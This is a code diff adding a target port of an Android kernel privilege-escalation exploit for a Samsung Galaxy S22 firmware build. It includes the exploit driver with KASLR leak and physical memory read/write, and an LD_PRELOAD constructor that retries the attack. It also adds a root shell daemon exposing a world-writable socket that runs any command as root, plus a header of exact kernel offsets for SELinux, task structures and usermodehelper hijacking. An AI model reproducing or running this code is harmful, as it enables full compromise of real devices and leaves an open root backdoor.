+    for (int fd = STDIN_FILENO; fd <= STDERR_FILENO; fd++) {
+      if (null_fd != fd) {
+        syscall(SYS_dup3, null_fd, fd, 0);
+      }
+    }
+    if (null_fd > STDERR_FILENO) {
+      syscall(SYS_close, null_fd);
+    }
+  } else {
+    syscall(SYS_close, STDIN_FILENO);
+    syscall(SYS_close, STDOUT_FILENO);
+    syscall(SYS_close, STDERR_FILENO);
+  }
+
+  struct timespec hold = {
+    .tv_sec = 86400,
+    .tv_nsec = 0,
+  };
+  for (;;) {
+    syscall(SYS_nanosleep, &hold, NULL);
+  }
+}
+
+int run_exploit(int argc, char **argv) {
+  (void)argc;
+  (void)argv;
+
+  disable_rseq_for_thread();
+  set_limit();
+  log_startup_context();
+  init_ashmem_path();
+
+  pin_to_core(CORE);
+  if (!slide_leak_kernel_base()) {
+    pr_error("slide kaslr leak failed\n");
+    return 1;
+  }
+  if (getenv("SLIDE_ONLY")) {
+    pr_success("slide-only done base=%016zx slide=%016zx p0_offset=%08zx\n",
+               kaslr_base, kaslr_slide, slide_p0_offset);
+    return 0;
+  }
+
+  pin_to_core(CORE);
+
+  run_main_route_threads();
+
+  pr_success("pipe-physrw-summary pid=%d done=%d root=%d kaslr=%d base=%016zx slide=%016zx\n",
+             getpid(), atomic_load(&cfi_stage_done), root_child_done,
+             kaslr_done, kaslr_base, kaslr_slide);
+  pr_success("pipe physrw pid=%d done=%d root=%d kaslr=%d read_ok=%d "
+             "write_ok=%d rw64=%d/%d uid=%u->%u\n",
+             getpid(), atomic_load(&cfi_stage_done), root_child_done, kaslr_done,
+             physrw_read_ok, physrw_write_ok, physrw_read64_ok, physrw_write64_ok,
+             root_uid_before, root_uid_after);
+  if (pipe_prepare_child > 0) {
+    SYSCHK(kill(pipe_prepare_child, SIGKILL));
+    SYSCHK(waitpid(pipe_prepare_child, NULL, 0));
+  }
+  int exploit_ok = atomic_load(&cfi_stage_done) && root_child_done;
+  if (exploit_ok) {
+    pid_t keeper = spawn_allocation_keeper();
+    pr_success("stability keeper pid=%d retaining reclaimed kernel pages\n",
+               keeper);
+  }
+  return exploit_ok ? 0 : 1;
+}

--- a/src/targets/S901USQU2BVK1/main.c
+++ b/src/targets/S901USQU2BVK1/main.c
@@ -212,7 +212,7 @@ int run_exploit(int argc, char **argv) {
     SYSCHK(waitpid(pipe_prepare_child, NULL, 0));
   }
   int exploit_ok = atomic_load(&cfi_stage_done) && root_child_done;
-  if (exploit_ok) {
+  if (exploit_ok && !cve_temp_root_mode()) {
     pid_t keeper = spawn_allocation_keeper();
     pr_success("stability keeper pid=%d retaining reclaimed kernel pages\n",
                keeper);

--- a/src/targets/S901USQU2BVK1/offset.h
+++ b/src/targets/S901USQU2BVK1/offset.h
@@ -1,0 +1,6 @@
+#ifndef TARGET_HEADER
+#define TARGET_HEADER "targets/S901USQU2BVK1/target.h"
+#endif
+
+#include TARGET_HEADER
+

--- a/src/targets/S901USQU2BVK1/preload.c
+++ b/src/targets/S901USQU2BVK1/preload.c
@@ -1,0 +1,91 @@
+#include "common.h"
+
+#define DEFAULT_EXPLOIT_ATTEMPTS 16
+#define DEFAULT_PSELECT_DELAY_USEC 20000
+
+static int env_int(const char *name, int fallback, int min, int max) {
+  const char *value = getenv(name);
+  if (!value || !*value) {
+    return fallback;
+  }
+
+  char *end = NULL;
+  errno = 0;
+  long parsed = strtol(value, &end, 0);
+  if (errno || end == value || *end || parsed < min || parsed > max) {
+    return fallback;
+  }
+  return (int)parsed;
+}
+
+static int attempt_delay_usec(int base_delay, int attempt) {
+  static const int offsets[] = {
+    0, 10000, 30000, 5000, 20000, -5000, 40000, 15000,
+  };
+  int count = (int)(sizeof(offsets) / sizeof(offsets[0]));
+  int delay = base_delay + offsets[(attempt - 1) % count];
+  return delay < 0 ? 0 : delay;
+}
+
+__attribute__((constructor)) static void load(void) {
+  static int started;
+  if (started) {
+    return;
+  }
+  started = 1;
+  set_unbuffer();
+  open_log();
+  
+  int max_attempts = env_int(
+      "EXPLOIT_ATTEMPTS", DEFAULT_EXPLOIT_ATTEMPTS, 1, 64);
+  int base_delay = env_int(
+      "PSELECT_DELAY_USEC", DEFAULT_PSELECT_DELAY_USEC, 0, 1000000);
+  if (getenv("SLIDE_ONLY")) {
+    max_attempts = 1;
+  }
+
+  unsetenv("LD_PRELOAD");
+  char *argv[] = {"preload.so", NULL};
+
+  pr_success("preload supervisor pid=%d attempts=%d base_delay=%d\n",
+             getpid(), max_attempts, base_delay);
+
+  for (int attempt = 1; attempt <= max_attempts; attempt++) {
+    int delay_usec = attempt_delay_usec(base_delay, attempt);
+    pid_t child = SYSCHK(fork());
+    if (child == 0) {
+      char delay[16];
+      snprintf(delay, sizeof(delay), "%d", delay_usec);
+      SYSCHK(setenv("PSELECT_DELAY_USEC", delay, 1));
+      pr_success("exploit attempt=%d/%d pid=%d delay=%d\n",
+                 attempt, max_attempts, getpid(), delay_usec);
+      _exit(run_exploit(1, argv));
+    }
+
+    int status = 0;
+    pid_t waited;
+    do {
+      waited = waitpid(child, &status, 0);
+    } while (waited < 0 && errno == EINTR);
+    if (waited < 0) {
+      pr_error("waitpid attempt=%d pid=%d errno=%d\n",
+               attempt, child, errno);
+    }
+    if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
+      pr_success("exploit completed attempt=%d/%d\n", attempt, max_attempts);
+      return;
+    }
+
+    if (WIFSIGNALED(status)) {
+      pr_warning("exploit attempt=%d/%d terminated signal=%d\n",
+                 attempt, max_attempts, WTERMSIG(status));
+    } else {
+      pr_warning("exploit attempt=%d/%d failed status=%d\n",
+                 attempt, max_attempts,
+                 WIFEXITED(status) ? WEXITSTATUS(status) : status);
+    }
+  }
+
+  pr_error("exploit failed after %d independent attempts\n", max_attempts);
+  _exit(1);
+}

--- a/src/targets/S901USQU2BVK1/su_daemon.c
+++ b/src/targets/S901USQU2BVK1/su_daemon.c
@@ -1,0 +1,350 @@
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <fcntl.h>
+#include <grp.h>
+#include <poll.h>
+#include <signal.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/un.h>
+#include <sys/wait.h>
+#include <termios.h>
+#include <unistd.h>
+
+#define SOCK_PATH "/data/local/tmp/temp_su.sock"
+
+static void set_root_env(void) {
+  setenv("PATH",
+         "/product/bin:/apex/com.android.runtime/bin:/apex/com.android.art/bin:"
+         "/apex/com.android.virt/bin:/system_ext/bin:/system/bin:/system/xbin:"
+         "/odm/bin:/vendor/bin:/vendor/xbin",
+         1);
+  setenv("HOME", "/data/local/tmp", 1);
+  setenv("USER", "root", 1);
+  setenv("LOGNAME", "root", 1);
+}
+
+static void xwrite(int fd, const void *buf, size_t len) {
+  const char *p = (const char *)buf;
+  while (len) {
+    ssize_t n = write(fd, p, len);
+    if (n < 0 && errno == EINTR) {
+      continue;
+    }
+    if (n <= 0) {
+      _exit(111);
+    }
+    p += n;
+    len -= (size_t)n;
+  }
+}
+
+static int read_full(int fd, void *buf, size_t len) {
+  char *p = (char *)buf;
+  while (len) {
+    ssize_t n = read(fd, p, len);
+    if (n < 0 && errno == EINTR) {
+      continue;
+    }
+    if (n <= 0) {
+      return 0;
+    }
+    p += n;
+    len -= (size_t)n;
+  }
+  return 1;
+}
+
+static int connect_daemon(void) {
+  int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
+  if (fd < 0) {
+    perror("su: socket");
+    return -1;
+  }
+
+  struct sockaddr_un sun;
+  memset(&sun, 0, sizeof(sun));
+  sun.sun_family = AF_UNIX;
+  snprintf(sun.sun_path, sizeof(sun.sun_path), "%s", SOCK_PATH);
+
+  if (connect(fd, (struct sockaddr *)&sun, sizeof(sun)) != 0) {
+    perror("su: connect daemon");
+    close(fd);
+    return -1;
+  }
+  return fd;
+}
+
+static int pump_pair(int a, int b) {
+  char buf[4096];
+  int a_open = 1;
+  int b_open = 1;
+
+  while (a_open || b_open) {
+    struct pollfd pfd[2];
+    int nfd = 0;
+    if (a_open) {
+      pfd[nfd].fd = a;
+      pfd[nfd].events = POLLIN;
+      nfd++;
+    }
+    if (b_open) {
+      pfd[nfd].fd = b;
+      pfd[nfd].events = POLLIN;
+      nfd++;
+    }
+
+    int pr = poll(pfd, (nfds_t)nfd, -1);
+    if (pr < 0 && errno == EINTR) {
+      continue;
+    }
+    if (pr < 0) {
+      return 1;
+    }
+
+    int idx = 0;
+    if (a_open) {
+      short re = pfd[idx++].revents;
+      if (re & POLLIN) {
+        ssize_t n = read(a, buf, sizeof(buf));
+        if (n > 0) {
+          xwrite(b, buf, (size_t)n);
+        } else {
+          a_open = 0;
+          shutdown(b, SHUT_WR);
+        }
+      } else if (re & (POLLHUP | POLLERR | POLLNVAL)) {
+        a_open = 0;
+        shutdown(b, SHUT_WR);
+      }
+    }
+    if (b_open) {
+      short re = pfd[idx++].revents;
+      if (re & POLLIN) {
+        ssize_t n = read(b, buf, sizeof(buf));
+        if (n > 0) {
+          xwrite(a, buf, (size_t)n);
+        } else {
+          b_open = 0;
+          shutdown(a, SHUT_WR);
+        }
+      } else if (re & (POLLHUP | POLLERR | POLLNVAL)) {
+        b_open = 0;
+        shutdown(a, SHUT_WR);
+      }
+    }
+  }
+  return 0;
+}
+
+static int client_main(int argc, char **argv) {
+  int fd = connect_daemon();
+  if (fd < 0) {
+    return 127;
+  }
+
+  if (argc >= 3 && strcmp(argv[1], "-c") == 0) {
+    char mode = 'C';
+    uint32_t len = (uint32_t)strlen(argv[2]);
+    xwrite(fd, &mode, 1);
+    xwrite(fd, &len, sizeof(len));
+    xwrite(fd, argv[2], len);
+    shutdown(fd, SHUT_WR);
+
+    char buf[4096];
+    for (;;) {
+      ssize_t n = read(fd, buf, sizeof(buf));
+      if (n < 0 && errno == EINTR) {
+        continue;
+      }
+      if (n <= 0) {
+        break;
+      }
+      xwrite(STDOUT_FILENO, buf, (size_t)n);
+    }
+    close(fd);
+    return 0;
+  }
+
+  char mode = 'I';
+  xwrite(fd, &mode, 1);
+  int rc = pump_pair(STDIN_FILENO, fd);
+  close(fd);
+  return rc;
+}
+
+static void exec_command_client(int conn, const char *cmd) {
+  pid_t pid = fork();
+  if (pid == 0) {
+    dup2(conn, STDIN_FILENO);
+    dup2(conn, STDOUT_FILENO);
+    dup2(conn, STDERR_FILENO);
+    close(conn);
+    set_root_env();
+    execl("/system/bin/sh", "sh", "-c", cmd, (char *)NULL);
+    _exit(127);
+  }
+
+  int status = 0;
+  while (waitpid(pid, &status, 0) < 0 && errno == EINTR) {
+  }
+}
+
+static int open_pty_master(char *slave, size_t slave_len) {
+  int master = posix_openpt(O_RDWR | O_NOCTTY | O_CLOEXEC);
+  if (master < 0) {
+    return -1;
+  }
+  if (grantpt(master) != 0 || unlockpt(master) != 0) {
+    close(master);
+    return -1;
+  }
+  if (ptsname_r(master, slave, slave_len) != 0) {
+    close(master);
+    return -1;
+  }
+  return master;
+}
+
+static void exec_interactive_client(int conn) {
+  char slave_name[128];
+  int master = open_pty_master(slave_name, sizeof(slave_name));
+  if (master < 0) {
+    const char msg[] = "su daemon: failed to open pty\n";
+    xwrite(conn, msg, sizeof(msg) - 1);
+    return;
+  }
+
+  pid_t pid = fork();
+  if (pid == 0) {
+    setsid();
+    int slave = open(slave_name, O_RDWR | O_NOCTTY);
+    if (slave < 0) {
+      _exit(126);
+    }
+    ioctl(slave, TIOCSCTTY, 0);
+    dup2(slave, STDIN_FILENO);
+    dup2(slave, STDOUT_FILENO);
+    dup2(slave, STDERR_FILENO);
+    if (slave > STDERR_FILENO) {
+      close(slave);
+    }
+    close(master);
+    close(conn);
+    set_root_env();
+    execl("/system/bin/sh", "sh", "-i", (char *)NULL);
+    _exit(127);
+  }
+
+  pump_pair(conn, master);
+  kill(pid, SIGHUP);
+  int status = 0;
+  while (waitpid(pid, &status, 0) < 0 && errno == EINTR) {
+  }
+  close(master);
+}
+
+static void serve_one(int conn) {
+  char mode = 0;
+  if (!read_full(conn, &mode, 1)) {
+    return;
+  }
+
+  if (mode == 'C') {
+    uint32_t len = 0;
+    if (!read_full(conn, &len, sizeof(len)) || len > 65536) {
+      return;
+    }
+    char *cmd = calloc(1, (size_t)len + 1);
+    if (!cmd) {
+      return;
+    }
+    if (!read_full(conn, cmd, len)) {
+      free(cmd);
+      return;
+    }
+    exec_command_client(conn, cmd);
+    free(cmd);
+  } else if (mode == 'I') {
+    exec_interactive_client(conn);
+  }
+}
+
+static int daemon_main(void) {
+  signal(SIGPIPE, SIG_IGN);
+  set_root_env();
+
+  int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
+  if (fd < 0) {
+    perror("socket");
+    return 1;
+  }
+
+  unlink(SOCK_PATH);
+  struct sockaddr_un sun;
+  memset(&sun, 0, sizeof(sun));
+  sun.sun_family = AF_UNIX;
+  snprintf(sun.sun_path, sizeof(sun.sun_path), "%s", SOCK_PATH);
+
+  if (bind(fd, (struct sockaddr *)&sun, sizeof(sun)) != 0) {
+    perror("bind");
+    return 1;
+  }
+  chmod(SOCK_PATH, 0666);
+  if (listen(fd, 16) != 0) {
+    perror("listen");
+    return 1;
+  }
+
+  for (;;) {
+    int conn = accept4(fd, NULL, NULL, SOCK_CLOEXEC);
+    if (conn < 0 && errno == EINTR) {
+      continue;
+    }
+    if (conn < 0) {
+      perror("accept");
+      sleep(1);
+      continue;
+    }
+
+    pid_t pid = fork();
+    if (pid == 0) {
+      close(fd);
+      serve_one(conn);
+      close(conn);
+      _exit(0);
+    }
+    close(conn);
+    while (waitpid(-1, NULL, WNOHANG) > 0) {
+    }
+  }
+}
+
+static int umh_main(void) {
+  if (geteuid() != 0) {
+    return 126;
+  }
+  if (setresgid(0, 0, 0) != 0 || setresuid(0, 0, 0) != 0 ||
+      getuid() != 0 || geteuid() != 0 || getgid() != 0 || getegid() != 0) {
+    return 125;
+  }
+
+  return daemon_main();
+}
+
+int main(int argc, char **argv) {
+  if (argc >= 2 && strcmp(argv[1], "--daemon") == 0) {
+    return daemon_main();
+  }
+  if (argc >= 2 && strcmp(argv[1], "--umh") == 0) {
+    return umh_main();
+  }
+  return client_main(argc, argv);
+}

--- a/src/targets/S901USQU2BVK1/target.h
+++ b/src/targets/S901USQU2BVK1/target.h
@@ -1,0 +1,261 @@
+#ifndef OFFSET_H
+#define OFFSET_H
+
+/*
+ * Samsung Galaxy S22 (SM-S901U, r0q/taro) — S901USQU2BVK1
+ * Android 13, kernel 5.10.81-android12-9.
+ *
+ * All symbol offsets extracted from the stock BVK1 vmlinux.  Structural
+ * (non-symbol) offsets shared with the S901WVLS4DWL3 v5.10 port.
+ *
+ * BVK1-specific notes:
+ *   - Kernel physical load address is 0x80080000 (NOT the 0xa8000000 used
+ *     by DWL3/GZF3+).  Verified empirically: runtime direct-map aliases of
+ *     init_task/root_task_group/sysctl_bootid are stable across boots and
+ *     give image_phys = 0x80080000 on every attempt.
+ *   - KASLR is page-granular (4K), coarse units of 2MB + fine mul>>21 term
+ *     in kaslr_early_init; slide computed via tracefs event 84 caller leak.
+ *   - __arm64_compat_sys_setsockopt is an ENOSYS stub => exp64 route only.
+ */
+
+#define BUILD_VARIANT_LABEL "r0q_taro_v5.10_S901USQU2BVK1"
+#ifndef BUILD_FINGERPRINT
+#define BUILD_FINGERPRINT "samsung/r0qcsx/r0q:13/TP1A.220624.014/S901USQU2BVK1:user/release-keys"
+#endif
+
+/* ---- Kernel image layout ---- */
+#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
+#define P0_PAGE_OFFSET   0xffffff8000000000ULL   /* 39-bit VA PAGE_OFFSET     */
+#define P0_PHYS_OFFSET   0x80000000ULL           /* memstart_addr             */
+/* DEVICE-VERIFIED via alias probe (2026-08-23): *ashmem_misc.fops readback
+ * matches ONLY with phys load 0xa8000000 + slide — same as DWL3/GZF3.
+ * The earlier 0x80080000 claim was formula-derived and wrong. */
+#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL
+
+#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
+#define KERNELSNITCH_IDENTITY_END   0xffffff9000000000ULL   /* 64GB direct map */
+#define DIRECT_MAP_BASE  0xffffff8000000000ULL
+#define DIRECT_MAP_END   0xffffff9000000000ULL
+#define VMEMMAP_START    0xfffffffeffe00000ULL   /* 39-bit v5.10 */
+
+/* ---- ashmem dispatch functions ---- */
+#define ASHMEM_MISC_FOPS_OFF 0x02709fc0ULL   /* &ashmem_misc.fops (ashmem_misc+0x10) */
+#define ASHMEM_FOPS_OFF      0x02055898ULL   /* &ashmem_fops           */
+
+#define ASHMEM_IOCTL_OFF         0x011ddff8ULL   /* ashmem_ioctl           */
+#define ASHMEM_COMPAT_IOCTL_OFF  0x011defc8ULL   /* compat_ashmem_ioctl    */
+#define ASHMEM_MMAP_OFF          0x011df020ULL   /* ashmem_mmap            */
+#define ASHMEM_OPEN_OFF          0x011df32cULL   /* ashmem_open            */
+#define ASHMEM_RELEASE_OFF       0x011df3c4ULL   /* ashmem_release         */
+#define ASHMEM_SHOW_FDINFO_OFF   0x011df5acULL   /* ashmem_show_fdinfo     */
+
+/*
+ * configfs — v5.10 uses old .read/.write API.
+ * .read slot MUST be configfs_read_file; .write slot MUST be
+ * configfs_write_bin_file (see S901WVLS4DWL3 notes).
+ */
+#define CONFIGFS_READ_ITER_OFF      0x0065bdf4ULL   /* configfs_read_file      */
+#define CONFIGFS_BIN_WRITE_ITER_OFF 0x0065c99cULL   /* configfs_write_bin_file */
+
+#define COPY_SPLICE_READ_OFF  0x0055d8fcULL   /* generic_file_splice_read */
+#define NOOP_LLSEEK_OFF       0x004e396cULL   /* noop_llseek              */
+
+/* ---- Kernel data objects ---- */
+#define INIT_TASK_OFF           0x025bbf00ULL   /* init_task           */
+#define ROOT_TASK_GROUP_OFF     0x027bb040ULL   /* root_task_group     */
+/* Runtime enforce flag = selinux_state.enforcing @ +0x00
+ * (selinux_state @ 0xffffffc00a8eca20).  NOT selinux_enforcing_boot. */
+#define SELINUX_ENFORCING_OFF   0x028eca20ULL   /* selinux_state.enforcing */
+#define KMALLOC_CACHES_OFF      0x02097658ULL   /* kmalloc_caches      */
+#define ANON_PIPE_BUF_OPS_OFF   0x01edd528ULL   /* anon_pipe_buf_ops   */
+
+/* ---- Convenience macros (absolute addresses) ---- */
+#define ASHMEM_MISC_FOPS    (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
+#define ASHMEM_FOPS         (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
+#define ASHMEM_IOCTL        (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
+#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
+#define ASHMEM_MMAP         (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
+#define ASHMEM_OPEN         (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
+#define ASHMEM_RELEASE      (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
+#define ASHMEM_SHOW_FDINFO  (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
+#define CONFIGFS_READ_ITER       (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
+#define CONFIGFS_BIN_WRITE_ITER  (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
+#define COPY_SPLICE_READ   (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
+#define NOOP_LLSEEK        (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
+#define INIT_TASK          (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
+#define ROOT_TASK_GROUP    (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
+#define SELINUX_ENFORCING  (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
+#define KMALLOC_CACHES     (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
+#define ANON_PIPE_BUF_OPS  (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)
+
+/* ---- Root usermodehelper ---- */
+#define ROOT_UMH_PATH "/data/local/tmp/cve-2026-43499-root"
+#define CALL_USERMODEHELPER_EXEC_WORK_OFF 0x0010c2d0ULL   /* &call_usermodehelper_exec_work - KIMAGE_TEXT_BASE */
+#define SYSTEM_UNBOUND_WQ_OFF 0x025a9e00ULL               /* &system_unbound_wq - KIMAGE_TEXT_BASE */
+
+/* ---- kCFI canonical (.cfi_jt) addresses ----
+ * Same policy as DWL3/GZF3: jump-table entries match the raw symbol
+ * addresses for these functions on this firmware family. */
+#define ASHMEM_IOCTL_JT_OFF           0x011ddff8ULL
+#define ASHMEM_COMPAT_IOCTL_JT_OFF    0x011defc8ULL
+#define ASHMEM_MMAP_JT_OFF            0x011df020ULL
+#define ASHMEM_OPEN_JT_OFF            0x011df32cULL
+#define ASHMEM_RELEASE_JT_OFF         0x011df3c4ULL
+#define ASHMEM_SHOW_FDINFO_JT_OFF     0x011df5acULL
+#define ASHMEM_LLSEEK_JT_OFF          0x011ddb9cULL   /* real table .llseek (ashmem_llseek) */
+#define CONFIGFS_READ_FILE_JT_OFF       0x0065bdf4ULL
+#define CONFIGFS_WRITE_BIN_FILE_JT_OFF  0x0065c99cULL
+#define NOOP_LLSEEK_JT_OFF            0x004e396cULL
+#define CALL_USERMODEHELPER_EXEC_WORK_JT_OFF 0x0010c2d0ULL
+
+#define ASHMEM_IOCTL_JT        (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_JT_OFF)
+#define ASHMEM_COMPAT_IOCTL_JT (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_JT_OFF)
+#define ASHMEM_MMAP_JT         (KIMAGE_TEXT_BASE + ASHMEM_MMAP_JT_OFF)
+#define ASHMEM_OPEN_JT         (KIMAGE_TEXT_BASE + ASHMEM_OPEN_JT_OFF)
+#define ASHMEM_RELEASE_JT      (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_JT_OFF)
+#define ASHMEM_SHOW_FDINFO_JT  (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_JT_OFF)
+#define ASHMEM_LLSEEK_JT       (KIMAGE_TEXT_BASE + ASHMEM_LLSEEK_JT_OFF)
+#define CONFIGFS_READ_FILE_JT       (KIMAGE_TEXT_BASE + CONFIGFS_READ_FILE_JT_OFF)
+#define CONFIGFS_WRITE_BIN_FILE_JT  (KIMAGE_TEXT_BASE + CONFIGFS_WRITE_BIN_FILE_JT_OFF)
+#define NOOP_LLSEEK_JT         (KIMAGE_TEXT_BASE + NOOP_LLSEEK_JT_OFF)
+#define CALL_USERMODEHELPER_EXEC_WORK_JT \
+  (KIMAGE_TEXT_BASE + CALL_USERMODEHELPER_EXEC_WORK_JT_OFF)
+#define CALL_USERMODEHELPER_EXEC_WORK \
+  (KIMAGE_TEXT_BASE + CALL_USERMODEHELPER_EXEC_WORK_OFF)
+#define SYSTEM_UNBOUND_WQ (KIMAGE_TEXT_BASE + SYSTEM_UNBOUND_WQ_OFF)
+#define ROOT_UMH_WORK_OFF 0x6000
+#define ROOT_UMH_DATA_OFF 0x6200
+
+/* ---- SKB delta ----
+ * BVK1 unix_stream_sendmsg geometry matches DWL3/GZF3:
+ * per-skb cap 36480 B = 0xe80 linear head + one 32KB order-3 frag page;
+ * payload pointers biased by -0xe80.  Also independently derived for BVK1
+ * from a live capture event (dance write at block+0x800 surfaced at content
+ * offset 0x1680). */
+#ifndef SKB_DATA_DELTA
+#define SKB_DATA_DELTA (-0xe80LL)
+#endif
+
+/* ---- SLIDE KASLR bypass offsets ---- */
+#define SLIDE_FAKE_WAITER_PRIO   0
+#define SLIDE_WAITER_WAKE_STATE  0
+#define SLIDE_LOCK_OWNER_VALUE   1ULL
+#define SLIDE_USE_FAKE_TASK      1
+#define SLIDE_RB_PARENT_TYPE_RESTORE 1ULL
+#define SLIDE_TRACEFS_EVENT_ID 84
+
+#define SLIDE_NFULNL_LOGGER_OFF        0x025b13a0ULL
+#define SLIDE_LOGGERS_0_1_OFF          0x025b12d0ULL   /* &loggers[0][1] = nfulnl_logger - 0xd0 */
+#define SLIDE_RANDOM_BOOT_ID_DATA_OFF  0x026ca978ULL   /* &random_table[4].data */
+#define SLIDE_INIT_TASK_OFF            INIT_TASK_OFF
+#define SLIDE_ROOT_TASK_GROUP_OFF      ROOT_TASK_GROUP_OFF
+#define SLIDE_SYSCTL_BOOTID_OFF        0x0298b984ULL   /* sysctl_bootid buffer */
+
+#define SLIDE_NFULNL_LOGGER_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
+#define SLIDE_LOGGERS_0_1_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
+#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
+#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
+#define SLIDE_ROOT_TASK_GROUP_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
+#define SLIDE_SYSCTL_BOOTID_IMAGE \
+  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)
+
+/*
+ * TraceFS worker caller offset — return address after worker_thread's
+ * bl schedule, BVK1-specific (device-verified across dozens of boots:
+ * unanimous votes every boot).
+ */
+#define SLIDE_TRACEFS_WORKER_CALLER_OFF 0x001185f8ULL
+
+/* ---- Fake page layout offsets (within the 32KB order-3 kernel page) ---- */
+#define LOCK_OFF    0x1350
+#define W0_OFF      0x2220
+#define FOPS_OFF    0x1000
+#define SCRATCH_OFF 0x3000
+#define RIGHT_OFF   0x4440
+#define LEFT_OFF    0x5550
+#define FAKE_TASK_OFF 0x3200
+
+/* ---- rt_mutex_waiter embedded offsets (v5.10) ---- */
+#define FAKE_WAITER_TREE_PRIO_OFF       0x18
+#define FAKE_WAITER_TREE_DEADLINE_OFF   0x20
+#define FAKE_WAITER_PI_TREE_ENTRY_OFF   0x18
+#define FAKE_WAITER_PI_TREE_PRIO_OFF    0x40
+#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
+#define FAKE_WAITER_TASK_OFF            0x30
+#define FAKE_WAITER_LOCK_OFF            0x38
+#define FAKE_WAITER_WAKE_STATE_OFF      0x60
+#define FAKE_WAITER_WW_CTX_OFF          0x68
+
+/* ---- task_struct internal offsets (v5.10; usage/prio byte-verified vs BVK1 init_task) ---- */
+#define FAKE_TASK_USAGE_OFF         0x40
+#define FAKE_TASK_PRIO_OFF          0x84
+#define FAKE_TASK_NORMAL_PRIO_OFF   0x8c
+#define FAKE_TASK_TASK_GROUP_OFF    0x310
+#define FAKE_TASK_PI_LOCK_OFF       0x86c
+#define FAKE_TASK_PI_WAITERS_OFF    0x880
+#define FAKE_TASK_PI_TOP_TASK_OFF   0x890
+#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x898
+
+/* ---- configfs buffer-private overlay offsets ---- */
+#define CFG_PAGE_OFF             16
+#define CFG_NEEDS_READ_FILL_OFF  80
+#define CFG_BIN_BUFFER_OFF       88
+#define CFG_BIN_BUFFER_SIZE_OFF  96
+#define CFG_CB_MAX_SIZE_OFF      100
+
+/* ---- workqueue_struct (v5.10) ---- */
+#define WQ_DFL_PWQ_OFF 0xb0
+
+/* ---- pool_workqueue offsets (v5.10, sizeof=256) ---- */
+#define PWQ_POOL_OFF         0x00
+#define PWQ_WQ_OFF           0x08
+#define PWQ_WORK_COLOR_OFF   0x10
+#define PWQ_REFCNT_OFF       0x18
+#define PWQ_NR_IN_FLIGHT_OFF 0x1c
+#define PWQ_NR_ACTIVE_OFF    0x58
+#define PWQ_MAX_ACTIVE_OFF   0x5c
+
+/* ---- worker_pool offsets (v5.10, sizeof=896) ---- */
+#define POOL_WORKLIST_OFF 0x20
+#define POOL_NR_IDLE_OFF  0x34
+
+/* ---- work_struct offsets (v5.10, sizeof=48) ---- */
+#define WORK_DATA_OFF  0x00
+#define WORK_ENTRY_OFF 0x08
+#define WORK_FUNC_OFF  0x18
+
+/* ---- struct page (v5.10, sizeof=64) ---- */
+#define STRUCT_PAGE_SIZE              0x40
+#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
+#define STRUCT_SLAB_CACHE_OFF         0x18
+#define STRUCT_PAGE_TYPE_OFF          0x30
+
+/* ---- pipe buffer ---- */
+#define PIPE_BUFFER_SLOTS         32
+#define PIPE_BUF_FLAG_CAN_MERGE   0x10
+
+/* ---- file_operations offsets (v5.10, sizeof=288=0x120) ---- */
+#define FOPS_OWNER_OFF        0x00
+#define FOPS_LLSEEK_OFF       0x08
+#define FOPS_READ_OFF         0x10
+#define FOPS_WRITE_OFF        0x18
+#define FOPS_READ_ITER_OFF    0x20
+#define FOPS_WRITE_ITER_OFF   0x28
+#define FOPS_IOCTL_OFF        0x50
+#define FOPS_COMPAT_IOCTL_OFF 0x58
+#define FOPS_MMAP_OFF         0x60
+#define FOPS_OPEN_OFF         0x70
+#define FOPS_RELEASE_OFF      0x80
+#define FOPS_SPLICE_READ_OFF  0xC8
+#define FOPS_SHOW_FDINFO_OFF  0xE0
+
+/* ---- v5.10 struct size overrides ---- */
+#define MM_STRUCT_SZ       960
+#define MM_CPU_PARTIAL     13
+#define KSNITCH_COLLISIONS 6
+
+#endif

